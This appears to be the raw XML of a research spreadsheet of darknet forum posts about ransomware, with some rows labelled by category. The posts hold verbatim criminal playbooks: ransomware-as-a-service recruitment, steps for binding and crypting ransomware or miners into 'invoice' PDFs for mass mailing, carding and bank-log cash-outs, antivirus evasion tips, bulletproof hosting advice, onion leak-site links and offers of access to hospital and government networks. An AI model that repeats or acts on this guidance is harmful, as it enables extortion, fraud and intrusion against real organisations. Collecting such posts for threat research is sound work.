    <t>we are offfering raas service and looking for affiliates who can gain access to companies and penetrate network for spreading solidbit ransomware.;we will only take 20% of your profit;;web panel for clients:;https://www.pcrisk.com/images/stories/screenshots202206/solidbit-ransomware-ransom-note-gif.gif;;gui:;https://www.pcrisk.com/images/stories/screenshots202206/solidbit-ransomware-ransom-note.jpg;;text note:;https://www.pcrisk.com/images/stories/screenshots202206/solidbit-ransomware-ransom-note-text-file.jpg;;contact:;tox: 3217bdd11cdf4f4a196892329e959e69aee4767d6470a35aa78d9a2eef1e7b4191336ecc1e45</t>
  </si>
  <si>
    <t>/u/Solidbit</t>
  </si>
  <si>
    <t>29/06/2022 02:13</t>
  </si>
  <si>
    <t>5ce649a02cfe70368338</t>
  </si>
  <si>
    <t>looking for affiliates - Solidbit - RAAS</t>
  </si>
  <si>
    <t>i'm looking for a raas that i can use for free and jsut share the profit with the creator</t>
  </si>
  <si>
    <t>/u/hydroepee819</t>
  </si>
  <si>
    <t>3337d9edcb9f08c8b225</t>
  </si>
  <si>
    <t>looking for comission based ransomeware as a service provider?</t>
  </si>
  <si>
    <t>89 days 12:31:00</t>
  </si>
  <si>
    <t>okay then;can you tell me where you got your ransomware from please?</t>
  </si>
  <si>
    <t>24/09/2022 21:51</t>
  </si>
  <si>
    <t>7d798581042421fffcd8</t>
  </si>
  <si>
    <t>looking for crypto mining malware? could someone let me know where to get</t>
  </si>
  <si>
    <t>0 days 08:01:00</t>
  </si>
  <si>
    <t>1 days 03:18:00</t>
  </si>
  <si>
    <t>go and search ransomware sites, lot of hackers upload data on their website for free</t>
  </si>
  <si>
    <t>14/08/2022 19:13</t>
  </si>
  <si>
    <t>7a666233d8b44fdcc88e</t>
  </si>
  <si>
    <t>looking for free credit card leaks</t>
  </si>
  <si>
    <t>1 days 13:46:00</t>
  </si>
  <si>
    <t>i need specific links the sites i found are publishing companies records and planes..etc</t>
  </si>
  <si>
    <t>/u/DarkFloat</t>
  </si>
  <si>
    <t>14/08/2022 19:15</t>
  </si>
  <si>
    <t>where can i get a working ransomware</t>
  </si>
  <si>
    <t>/u/battlestarg</t>
  </si>
  <si>
    <t>18/04/2022 14:36</t>
  </si>
  <si>
    <t>e74f0a47ccd45c9311b2</t>
  </si>
  <si>
    <t>looking for latest ransomware</t>
  </si>
  <si>
    <t>21 days 00:49:00</t>
  </si>
  <si>
    <t>/d/redeemer</t>
  </si>
  <si>
    <t>18/04/2022 14:50</t>
  </si>
  <si>
    <t>hello there. i heard putinsclub is one of the best malware and ransomware provider in the market right now. try are available on tg i believe. check them out.</t>
  </si>
  <si>
    <t>/u/babesking</t>
  </si>
  <si>
    <t>18/04/2022 15:05</t>
  </si>
  <si>
    <t>hi. i am owner of yashma ransomware. can provide latest version of my product.</t>
  </si>
  <si>
    <t>information (provider) / raas provider (individual)</t>
  </si>
  <si>
    <t>17 days 22:24:00</t>
  </si>
  <si>
    <t>looking for ransomware malware please could anyone guide me to where one can get their hands on such malware;;was thinking about hacktown but i dont wanna pay the $250 membership bond for nothing, so does anyone know if the "amoury" in hacktown is solid and has ransomware for sale</t>
  </si>
  <si>
    <t>19/09/2022 22:18</t>
  </si>
  <si>
    <t>8a8806eacfbfe71dc24e</t>
  </si>
  <si>
    <t>looking for solid working real malware?</t>
  </si>
  <si>
    <t>0 days 09:23:00</t>
  </si>
  <si>
    <t>warzone and venom are the best malware/rat in 2022 . can find in big markets : alpahabay , asap , use search function , many vendors selling it</t>
  </si>
  <si>
    <t>/u/drbaba</t>
  </si>
  <si>
    <t>20/09/2022 00:03</t>
  </si>
  <si>
    <t>looking specifically for a ransomware program that encrypts a whole computer  after clicking or downloading a link, know anywhere that has real solid vendors for this kind of shit? you have any experience with hacktown?</t>
  </si>
  <si>
    <t>20/09/2022 04:14</t>
  </si>
  <si>
    <t>0 days 04:11:00</t>
  </si>
  <si>
    <t>hey mate would ya be able to suggest a solid vendor on a market that sells these ransomware products? because i can not simply find any solid people</t>
  </si>
  <si>
    <t>/u/TrynaJustTry</t>
  </si>
  <si>
    <t>20/09/2022 07:41</t>
  </si>
  <si>
    <t>0 days 03:27:00</t>
  </si>
  <si>
    <t>what im thinking is to get a server for c2 implant which will act as a proxy between me any the infected devices to stay anonymous, server side i can manage now. im looking for cryptography ebooks and resources or github's link to study ransomware development</t>
  </si>
  <si>
    <t>ce4a82a3102e01763394</t>
  </si>
  <si>
    <t>malware development c++ resource</t>
  </si>
  <si>
    <t>5 days 01:38:00</t>
  </si>
  <si>
    <t>im willing to put in the time to learn how to develop fud ransomware</t>
  </si>
  <si>
    <t>23/07/2021 02:40</t>
  </si>
  <si>
    <t>d55c01a7cc4d93c5652d</t>
  </si>
  <si>
    <t>malware development, how to start?where to start?</t>
  </si>
  <si>
    <t>31 days 22:33:00</t>
  </si>
  <si>
    <t>it's going to take a tremendous amount of time before you're able to code fully function ransomware that works well. and once you have it you need to find / have exploits or find ways to get into corporate networks and gradually move through the network (infecting every device on it), and extorting data and then encrypting all machines.;;seems like a cool idea at first but at hindsight it takes a way longer time to achieve this goal.;;start learning c and learn about the linux os api / winapi, i'd advice to also look at x86 and some web programming (assuming you want your admin panel to be web based). later you can look at cryptography and learn about that, mainly math is important in that field, you don't need to be an expert in it just understand it and understand the different algorithms, and the probability of the key being cracked.;;after that you want to look at pentesting / bughunting so you can actually get into networks first, before you start thinking about ransoming them.</t>
  </si>
  <si>
    <t>20 days 07:01:00</t>
  </si>
  <si>
    <t>&gt;&gt; as you can find advertising for parts of their database to buy on cryptbb and breached forums;&gt;&gt; how alphabay is in the middle of a ransomware attack from hackers;proof or gtfo skid.;;&gt;&gt; vendors are being banned they are losing money the lot;there we go. most likely one of the unhappy vendors again creating posts thinking that will get them unbanned because they were a shit vendor on our platform.;;mods this is vendor from yesterday with another lame attempt at fud.;;;/u/samwhiskey;mod;;/u/humanpie;newkidintown;;/u/dontlaugh;darknet shaman;;thank you.</t>
  </si>
  <si>
    <t>28/09/2022 00:16</t>
  </si>
  <si>
    <t>c118e19126d107f51f05</t>
  </si>
  <si>
    <t>mods dont delete this LOOK into it now!</t>
  </si>
  <si>
    <t>1 days 08:17:00</t>
  </si>
  <si>
    <t>in the darknet you can make money :;;1) buying in bulk and reselling drugs/fake money , resell on the streets or in any darknet market;;2) carding , buy some good cc at any good cc autoshop ex : benumb (it a private market that sells the best cc in town :) , its invite only , you can find invite codes on whitehouse ,  worldmarket (or any darknet market );;;cf worldmarket or whitehouse (or any darknet market ) &gt;&gt; search &gt;&gt; benumb;;3) cashout bank logs or paypal accounts with balance;;go whitehouse market , dark0de , worldmarket  (or any darknet market ) &gt;&gt; search &gt;&gt; hacked paypal;;or search &gt;&gt;;chase;boa;creditonebank;chime;keybank;;....................;;4) buy huge business email list + ransomware + smtp server (to send mass emails) &gt;&gt; bind  the ransomware into a pdf file (name it : inquiry or invoice if you target business emails) + crypt it &gt;&gt; start sending thousands emails to companies &gt;&gt; it will work 100% (if you have a good ransomware + crypter undetected by antivirusses = any business that receive a pdf file called invoice or inquiry will open the file 100% &gt;&gt; boom the ransomware will encrypt all files and ask for a ransom in btc or xmr n&gt;&gt; boom &gt;&gt; done;;where to find ransomware &gt;&gt; whitehouse market , dak0de or worldmarket (or any darknet market ) &gt;&gt; search &gt;&gt; ransomware;;you can do the same by sending trojan , most popular trojans nowaday &gt;&gt; venom , warzone;;cf dak0de market (or any darknet market ) &gt;&gt; venom rat , warzone rat;;5) digital cash : buy bank logs (from any vendor or genesis market ) with account number + routing number (an/rn) and make digital checks for mobile deposits (you have access to the account &gt;&gt; so you know the exact account balance &gt;&gt; make digital check .;;buy bank drop linked to an exchanger &gt;&gt; deposit the digital check to your drop &gt;&gt; buy xmr &gt;&gt; withdraw &gt;&gt; done;;genesis market search invite code on any market;;6) buy huge email database list ( ex : you can find on any darknet market :  hacked facebook database = 523 millions emails + phone numbers worldwide) &gt;&gt; send silent monero miner + crypter &gt;&gt; bind your silent miner in a pdf file &gt;&gt; crypt it &gt;&gt; buy smtp server ( search whitehouse market / dark0de or any darknet market ) &gt;&gt;   start sending hundreds thousands emails &gt;&gt; once your victim opens the email &gt;&gt; boom &gt;&gt; the silent miner will start mining monero for you &gt;&gt; just imagine thousands computers start mining monero for you :);;you can find all these software in whitehouse , dark0de or worldmarket;;7) clone credit cards : dumps 101 / 201 and emv x2 software to clone cc , buy blank cards + writer + emv x2 software (search for 2020 or 2021 versions) + buy dump from autoshops &gt;&gt; clone credit cards &gt;&gt; use it instore (best if you have a friend who owns a shop ) or withdraw at atm (if you find seller dumps+pin &gt;&gt; very hard to find &gt;&gt; many scammers;;dark0de &gt;&gt; search &gt;&gt;;emv x2;;whitehouse &gt;&gt; search &gt;&gt; dumps;;(or any darknet market  , ive seen these software in dark0de and whm );;;enjoy bro :)</t>
  </si>
  <si>
    <t>/u/drjamesbond</t>
  </si>
  <si>
    <t>17/07/2021 01:56</t>
  </si>
  <si>
    <t>40373b7bb43cf3cdb3e2</t>
  </si>
  <si>
    <t>need help making money</t>
  </si>
  <si>
    <t>37 days 04:25:00</t>
  </si>
  <si>
    <t>dude just use ransomware will be easy than harm building :)))))</t>
  </si>
  <si>
    <t>31/05/2022 21:19</t>
  </si>
  <si>
    <t>b16d6f891ab62715f3a5</t>
  </si>
  <si>
    <t>opsec for extorting businesses</t>
  </si>
  <si>
    <t>0 days 10:30:00</t>
  </si>
  <si>
    <t>1 days 01:22:00</t>
  </si>
  <si>
    <t>i am looking for some ways to make a target run ransomware. the target would be a small business where the workers are not very knowledgeable when it comes to it.;;i thought about just email but i am sure no one would just download an exe and run it.</t>
  </si>
  <si>
    <t>/u/klazen</t>
  </si>
  <si>
    <t>30/08/2021 03:31</t>
  </si>
  <si>
    <t>a795f8961b3e9d63144c</t>
  </si>
  <si>
    <t>options to make target run ransomware</t>
  </si>
  <si>
    <t>3 days 09:31:00</t>
  </si>
  <si>
    <t>i am a hacker, i am looking for raas service, can we cooperate</t>
  </si>
  <si>
    <t>3 days 02:07:00</t>
  </si>
  <si>
    <t>;;ozbabe hacked (by me) and refusing to pay extortion request so customer info will be released within 24 hours;;by;/u/thankmelater123;���;3 months ago;in;/d/darknetaustralia;;-2 points;���;15</t>
  </si>
  <si>
    <t>Person talking about hacking someone</t>
  </si>
  <si>
    <t>debate / hacker (individual)</t>
  </si>
  <si>
    <t>/u/BarK1ng</t>
  </si>
  <si>
    <t>/d/DreadMoment</t>
  </si>
  <si>
    <t>b7c3152fab432c16a026</t>
  </si>
  <si>
    <t>ozbabe hacked (by me) (im a genius) (mom get the camera)</t>
  </si>
  <si>
    <t>0 days 12:25:00</t>
  </si>
  <si>
    <t>let's say if everything you have posted is correct. if this ozbabe had any sense at all they wouldn't pay you a thing because you want that money and you believe that the threat of releasing ozbabes details will be enough to scare them into paying. all they have to do is wait it out because if give up your bargaining chip by posting the info here you have fuck all chance of getting any money.;;you don't have to be a genius to see that. unless you are implying that ozbabe is thick as shit because they are australian so will be stupid enough to hand over 12k to you. i'm english so cannot really comment about the percieved intelligence of australians but you know and i know the closer to zero hour becomes, the more you will be shitting it because your chance of profit diminishes by the second.</t>
  </si>
  <si>
    <t>/u/deerp</t>
  </si>
  <si>
    <t>political ransomware -- it would be used on police station or courthouse networks, and only decrypt after they do an action (instead of paying) like releasing a prisoner, arresting a cop, passing a bill... could also use on industrial/scada to ramp up the pressure;;do you think this could work, why or why not...?;;imo this is long overdue. we as hackers have been far too passive and self-centered with our abilities. if done effectively and really locking them the fuck up i think could do some good and hit these white terror orgs where it hurts</t>
  </si>
  <si>
    <t>Debating ransomware</t>
  </si>
  <si>
    <t>/u/harpersferry</t>
  </si>
  <si>
    <t>24/09/2020 06:23</t>
  </si>
  <si>
    <t>18e40d7991efa7a1d086</t>
  </si>
  <si>
    <t>political ransomware</t>
  </si>
  <si>
    <t>5 days 03:14:00</t>
  </si>
  <si>
    <t>yeah arresting the cop is probably not realistic, but say there was a court case..hitting all the lawyers, courthouse, jury and witnesses involved.;;my point is ransomware can be used for more than just money!;;also check out the ransom attack on stuart, fl police department and the drug dealers that walked free because of it lmao</t>
  </si>
  <si>
    <t>29/09/2020 09:37</t>
  </si>
  <si>
    <t>1 days 09:22:00</t>
  </si>
  <si>
    <t>hello everyone. i looking some good ransom group. we can make good deal together. i have people in some corporations and they can put yours malware from inside. whaiting for serious contacts and offers, it is not post for beginners.</t>
  </si>
  <si>
    <t>/u/konradruiz</t>
  </si>
  <si>
    <t>7edb1f28d428128d58c7</t>
  </si>
  <si>
    <t>4 days 23:28:00</t>
  </si>
  <si>
    <t>you are wasting your time. the age of ransomware is over.;;i can help you make money if what you are saying is true either way.  check pm</t>
  </si>
  <si>
    <t>/u/sinister6</t>
  </si>
  <si>
    <t>ransomware is far from over. what are you smoking?</t>
  </si>
  <si>
    <t>/u/wakolisic</t>
  </si>
  <si>
    <t>its over for anyone who wants to stay out of prison for life;;ransomware as a service is still an amazing business to run but not to participate in</t>
  </si>
  <si>
    <t>hey ransomware ,;;;how can i make money i am so broke now , i can do what ever work you offer me , help me make money im in need of it right now</t>
  </si>
  <si>
    <t>/u/AWESOMEKID</t>
  </si>
  <si>
    <t>i need a good working ransomware programm, can anyone help me?</t>
  </si>
  <si>
    <t>/u/klaasjan2</t>
  </si>
  <si>
    <t>63a6afe2dac325e9eec6</t>
  </si>
  <si>
    <t>1 days 01:45:00</t>
  </si>
  <si>
    <t>here ya go, including wannacry which almost took down the internet.  they're all malware binaries in zip files so be careful:;https://github.com/fabrimagic72/malware-samples/tree/master/ransomware</t>
  </si>
  <si>
    <t>so how does the ransomware work? i just download it and send it to someone and then part of the profit i get?</t>
  </si>
  <si>
    <t>/u/thedigitalbandit</t>
  </si>
  <si>
    <t>and which is better wannacry or filladefhia?</t>
  </si>
  <si>
    <t>ive been trying to optimize my ransomware campaigns (windows) recently and i just got my hands on some brand new malware. does anyone have good experience in ransomware distribution? what brought you your success?;;ive tried the classic pdf/doc file spreading via paid advertising but tbh i didnt really get the results i wanted. i might want to find distribution partners who will get a cut of successful infection profit but idk if thats the right approach either.;;is there some big method i can implement in my campaigns that i somehow missed?;;id really appreciate any thoughts your willing to share. thanks</t>
  </si>
  <si>
    <t>/u/xm_Roman</t>
  </si>
  <si>
    <t>22/03/2021 07:52</t>
  </si>
  <si>
    <t>3c02c8a49e38b3d7704a</t>
  </si>
  <si>
    <t>ransomware distribution</t>
  </si>
  <si>
    <t>8 days 21:00:00</t>
  </si>
  <si>
    <t>hi bro just buy an email list from the ,arket (busiiness database ) &gt;&gt; buy smtp server &gt;&gt; crypt your ransomware to become undetectable &gt;&gt; send millions emails with nice message (use your imagination) or spoof paypal.com , ebay.com .........email there is a nice package u bought on whm with million emails + tools to spoof email + mobile phone from any website;;the listing on whitehouse market title : full scamming (or spamming tutorial = i dont remember);;search for it = very usefull</t>
  </si>
  <si>
    <t>24/03/2021 15:40</t>
  </si>
  <si>
    <t>0 days 10:49:00</t>
  </si>
  <si>
    <t>do you even understand the concept that most modern ransomwares are post-exploitation malware for targeted infections of networks ? 2017 and era of wannacry mass infects on mail spam is long time passed;;you either hit them up on bots you already have infected with loaders;or you get to corp networks through compromised rdps or phished citrix or phished forti vpn which you use to over lan connect to other devices;;;ads and fuded docs can be used for spreading loader, over which through powershell you hit ransomwares;to hit them directly is waste of time;;;which ransomware you use if is not a secret ?;if you want to work seriously drop me your jabber or tox in pm</t>
  </si>
  <si>
    <t>Debating ransomware and seeking potential work</t>
  </si>
  <si>
    <t>potential hacker (individual) / information (provider)</t>
  </si>
  <si>
    <t>31/03/2021 04:52</t>
  </si>
  <si>
    <t>6 days 13:12:00</t>
  </si>
  <si>
    <t>hey i'm planning on spreading some ransomware. this is my first time :d. i only need to make a thousand or so.;;should i bother coding my own? in tha case what programming language(s) should i be using? what should my targets be, persons or companies? eventually, what would be some effective methods of spreading? (i could figure the last one out myself, but if you have some great ideas, please go ahead and share :-);;thanks in advance!</t>
  </si>
  <si>
    <t>Planning an attack and requesting info</t>
  </si>
  <si>
    <t>da7d21ff0323e1ac7c23</t>
  </si>
  <si>
    <t>ransomware first timer</t>
  </si>
  <si>
    <t>50 days 02:55:00</t>
  </si>
  <si>
    <t>which rat ransomwares are the best ?</t>
  </si>
  <si>
    <t>22/03/2021 01:33</t>
  </si>
  <si>
    <t>41 days 21:01:00</t>
  </si>
  <si>
    <t>depends on what you're after and you're budget.;;thanos is an excellent choice. i won't link it here as this is for sale in private forums and others means but i'm sure if you dig long and hard enough you'll find it ;)</t>
  </si>
  <si>
    <t>24/03/2021 18:18</t>
  </si>
  <si>
    <t>2 days 16:45:00</t>
  </si>
  <si>
    <t>does anyone know where to buy solid ransomware that works properly and encrypts victims computer solidly, any help is appreciated need malware quite urgently as i have a plan to execute, is hacktown a good source to buy ransomware?</t>
  </si>
  <si>
    <t>22/09/2022 21:21</t>
  </si>
  <si>
    <t>211fbba4e914c37994d5</t>
  </si>
  <si>
    <t>ransomware needed please?</t>
  </si>
  <si>
    <t>2 days 15:24:00</t>
  </si>
  <si>
    <t>you can find at cryptbb or hacktown</t>
  </si>
  <si>
    <t>/u/smart666tiger3</t>
  </si>
  <si>
    <t>25/09/2022 12:45</t>
  </si>
  <si>
    <t>if you want really bulletproof and safe and anonymous server provider you need to look which ones are used by hacking groups to host panels for their botnets with milions of vics/bots, and for ransomware panels and similar.and what better place to look for this then exploit forum ( maybe on maza, but that is overkill );;don't look at the mainstream darkweb shit.;;;servers should be in mother russia.;;golden standard for server hosters for malware panels and botnets is flowspec.;other than flowspec, there is also bearhost.;;both hosted in mother russia;;;and never never self host the servers with crime stuff</t>
  </si>
  <si>
    <t>31/12/2020 06:47</t>
  </si>
  <si>
    <t>fc76e837085a7e0b5e55</t>
  </si>
  <si>
    <t>server renting services (Clearnet and Darknet)</t>
  </si>
  <si>
    <t>1 days 05:21:00</t>
  </si>
  <si>
    <t>6 days 03:54:00</t>
  </si>
  <si>
    <t>it uses aes encryption to encrypt each file with a new key, then the key created is encrypted with rsa public key for each file. ive been researching other ransomware and the wannacry rw uses another step of encryption, i would like to implement this as well. i would like to encrypt the rsa private key used to decrypt the aes key with my c2 servers public key. ive looked this up on the clearnet but i cannot find anything ,how would i go on about this?;what are good techniques for obfuscation? also what other good techniques should be added? thanks</t>
  </si>
  <si>
    <t>4434e064b4de426472c1</t>
  </si>
  <si>
    <t>successfully created a basic ransomware, what other modern sophisticated techniques should i add? and how to host c2 server?</t>
  </si>
  <si>
    <t>c583092d36a85cf2f21d</t>
  </si>
  <si>
    <t>successfully created a basic ransomware, what other modern sophisticated techniques should i add? how to host c2 server and use it in my ransommware?</t>
  </si>
  <si>
    <t>1 days 02:08:00</t>
  </si>
  <si>
    <t>the aes/rsa encryption is very strong, there is no need to encrypt in another layer. you'd be trading speed for diminishing returns on encryption.;;for obfuscation techniques, you can search for process injection on clearnet like this one for example : https://www.ired.team/offensive-security/code-injection-process-injection;the key here is that there are 2 stages of deploying fud malware. first is getting past av's static analysis, you will need a crypter to encrypt your payload, you can dyor or use msfvenom, it's free.;the second stage is dynamic analysis, where the av uploads the payload onto their server and simulate at runtime to see if the program does anything cheeky. this one would require process injection to hide from av to get itself fully undetected!;;that's all i know so far, i read greyset for all of this information and frankly it's better you go there check it out as i may misunderstood a few things.</t>
  </si>
  <si>
    <t>/u/uptonogood123</t>
  </si>
  <si>
    <t>soo, i wanna try to make a functioning blackmail bitcoin ransomware. i dont really have very much experience with coding but i still wanna try to make it work. but i dont wanna waste a good amount of time to fail in the end. that��s why i��m looking for someone with  some knowledge and experience with coding/ransomware who i could ask for advice, if i`m stuck with a problem. so if u can help me out, if necessary, i will pay u for your support. and also u will get a cut of the profits.;spreading it will be no problem.;hit me up if u can helpout and wanna make some easy money.;i would very much appreciat</t>
  </si>
  <si>
    <t>/u/onsmsht</t>
  </si>
  <si>
    <t>25/05/2019 17:21</t>
  </si>
  <si>
    <t>ca2f811d1c8799591826</t>
  </si>
  <si>
    <t>trying to make some money with BTC Ransomware</t>
  </si>
  <si>
    <t>316 days 01:22:00</t>
  </si>
  <si>
    <t>&gt;btc;switch to xmr instead. btc is no longer secure and transactions can be easily tied to your real identity. btc has been used all this time because it was the only thing available, now you have better options.;&gt;i dont really have very much experience with coding;then don't. because there are tons of badly written malware by script kiddies already. if you are targeting windows then learn c/c++ first, then x86/x86-64 assembly, windows internals, reverse engineering, malware analysis, dfir (digital forensics &amp; incident response). malware is not just the payload, you also need to know how to do anti-reversing, anti-debugging, anti-forensics as it is needed. the shitty ransomware written in c#/java/python can be reversed in seconds and will only make a nice "writeup" on some newbie white hat reverse engineer's personal blog and it's going to get fingerprinted in hours, and since you don't have necessary skills to write poly/meta-morphic code you are going to have to use multiple shitty packers with shitty backdoors written by yet another shitty hackforums-tier skid. so just don't and save yourself from all the trouble. there is only one proven single way to do it, and it has not changed since msdos times. there are no shortcuts. those who take the shortcuts are the same idiots you read about in the news.</t>
  </si>
  <si>
    <t>25/05/2019 18:10</t>
  </si>
  <si>
    <t>hi;can someone explain if its possible to have wannacry ransomeware on a rubber ducky, and how to set it up?;;in a scenario where a machine is connected to a server what happens when wannacry is activated does it encrypt the machine and the server connected to it?;;thanks!</t>
  </si>
  <si>
    <t>/u/ikea</t>
  </si>
  <si>
    <t>16/11/2021 09:55</t>
  </si>
  <si>
    <t>c80c611956a93d02c291</t>
  </si>
  <si>
    <t>wannacry</t>
  </si>
  <si>
    <t>1 days 12:43:00</t>
  </si>
  <si>
    <t>depends on the targets os since most servers use linux you need to think of another way because wannacry only executes on windows;there are python tools that you can use to encrypt data with a random key check out github;configure rubberducky to act as a keyboard decrease the delay, make the system to run it in ttyl terminal so user wont notice;what do you mean by machine like a usb or a printer?</t>
  </si>
  <si>
    <t>16/11/2021 11:20</t>
  </si>
  <si>
    <t>0 days 01:25:00</t>
  </si>
  <si>
    <t>do it in 2 times. first with the rducky, then, access to their system, and execute the ransomware, what os is it ?</t>
  </si>
  <si>
    <t>17/11/2021 22:38</t>
  </si>
  <si>
    <t>1 days 11:18:00</t>
  </si>
  <si>
    <t>raid, nulled, intelx, distributed denial of secrets and cracked. see;[1];for raas leaks and;[2];for more services.;;;[1]:;;/post/2f9b8f8f2aea0261ee21;;[2]:;;/post/10f12b1dee8a0559c61b;/#c-c14130a36b61b73fa8</t>
  </si>
  <si>
    <t>a url and information for leak websites</t>
  </si>
  <si>
    <t>30/10/2021 20:18</t>
  </si>
  <si>
    <t>c2c0aa6adbd53e74fbf8</t>
  </si>
  <si>
    <t>website that post breaches?</t>
  </si>
  <si>
    <t>6 days 20:43:00</t>
  </si>
  <si>
    <t>http://sizeofaex6zgovemvemn2g3jfmgujievmxxxbcgnbrnmgcjcjpiiprqd.onion/post/ransomware-darknet-websites/</t>
  </si>
  <si>
    <t>a onion url for lockbit and hive</t>
  </si>
  <si>
    <t>/u/bogdan_gee</t>
  </si>
  <si>
    <t>29/08/2022 16:58</t>
  </si>
  <si>
    <t>403fa44ec49da899bc85</t>
  </si>
  <si>
    <t>what is lockbit and hives onion links?</t>
  </si>
  <si>
    <t>m looking for ransomware as a service. i would like to work with a team similar to ryuk, revil, or gand crab. i have access to multiple corporate vpn networks including uk government, us government, saudi arabia government, thailand government, canada goverment, police departments, united states public schools, malaysia university, japan university, germany shipping businesses, israel supplychain businesses, canada hospitals, us hospitals, and large companies in the energy industry.;;the vpn access provides access to all internal networks which include intranet, help desk software, web applications, ssh and rdp. i have rdp access for many companies including small networks with only 5 computers, and also i have rdp access for networks with 1000 computers.;;other than exploit.in forum which ransomware authors provide payment split share model 40/60 or 50/50? i am also willing to sell access to the networks for anyone who wants to introduce their own malware. before you talk about ethics i'm not using ransomware on individual people i'm targeting large companies and government agencies.</t>
  </si>
  <si>
    <t>User with supposed access to a large amount of data asking for raas to exploit this information</t>
  </si>
  <si>
    <t>/u/BlackStone9</t>
  </si>
  <si>
    <t>29/04/2020 20:14</t>
  </si>
  <si>
    <t>2f302ecfd9ff9b7a0752</t>
  </si>
  <si>
    <t>where to find ransomware similar to Ryuk and Revil?</t>
  </si>
  <si>
    <t>ryuk and revil are very 'closed' and exclusive. like sality and other older malwares.;;not tried ghostly...but if you are want ready to use stuff...ransom-hq is still work..</t>
  </si>
  <si>
    <t>/u/fifouFight</t>
  </si>
  <si>
    <t>29/04/2020 20:16</t>
  </si>
  <si>
    <t>i be lookin for some fun time ransomware. if you know the best market that hosts these vendors?;;love ya</t>
  </si>
  <si>
    <t>User requesting ransomware</t>
  </si>
  <si>
    <t>18/11/2021 10:18</t>
  </si>
  <si>
    <t>/d/DarkNetAustralia</t>
  </si>
  <si>
    <t>e02c70f66913241d8095</t>
  </si>
  <si>
    <t>yo yo yo!! any ransomware vendors?</t>
  </si>
  <si>
    <t>6 days 23:53:00</t>
  </si>
  <si>
    <t>putting ransomware on another persons computer is illegal without previous permission. you shouldn't do illegal things because you might get arrested. just my 2 cents.;;jokes aside. you are much better off going to one of those clear net hacking websites and ordering off a trusted member. dark net is not really needed for this kind of thing.</t>
  </si>
  <si>
    <t>User requesting ransomware - user recommending going to clearnet sites</t>
  </si>
  <si>
    <t>/u/aufreedom</t>
  </si>
  <si>
    <t>18/11/2021 12:15</t>
  </si>
  <si>
    <t>0 days 01:57:00</t>
  </si>
  <si>
    <t>[link to listing ];;any dark0de mirror add at the end of the adress :;;/product/pdkbeww200343106;;;this is by far the best ransomware ever;;best tool ever to make huge money;;promotion : for now price is 55 usd , after 10 sales price will be 1500 $ , hurry up get it while its cheap;;you can send it to all big companies , commerce , hospital;;for educational purpose only , im not responsible of what you will do;;you will receive tutorial how to use it for free (usually darknet ransomware seller dont gives you tutorial , only download link) , how to send it by email , how to put desired amount and how to spread it (many spreading methods);;100% undetectable;;its a ransomware-like file crypter sample which can be modified for specific purposes.;;features;;uses aes algorithm to encrypt files.;sends encryption key to a server.;encrypted files can be decrypt in decrypter program with encryption key.;creates a text file in desktop with given message.;small file size (12 kb);not detected by antivirus programs;;;[link to listing ];;any dark0de mirror add at the end of the adress :;;/product/pdkbeww200343106</t>
  </si>
  <si>
    <t>User promoting their ransomware</t>
  </si>
  <si>
    <t>25/02/2021 07:19</t>
  </si>
  <si>
    <t>/d/Dark0deReborn</t>
  </si>
  <si>
    <t>322215e1083c325035ce</t>
  </si>
  <si>
    <t>��� New promotion��� best ransomware ever 100% undetectable+tutorial���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</si>
</sst>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h:mm"/>
    <numFmt numFmtId="165" formatCode="m/d/yyyy\ h:mm"/>
  </numFmts>
  <fonts count="5">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>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1" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="165" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf quotePrefix="1" borderId="0" fillId="0" fontId="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lackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion/;http:/lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://share.vx-underground.org/conti/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.coresecurity.com/core-labs/articles/what-zeppelin-ransomware-steps-prepare-respond-and-prevent-infection" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sizeofaex6zgovemvemn2g3jfmgujievmxxxbcgnbrnmgcjcjpiiprqd.onion/post/ransomware-darknet-websites/"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25"/>
    <col customWidth="1" min="3" max="3" width="18.0"/>
    <col customWidth="1" min="4" max="4" width="30.75"/>
    <col customWidth="1" min="5" max="5" width="18.13"/>
    <col customWidth="1" min="6" max="6" width="18.25"/>
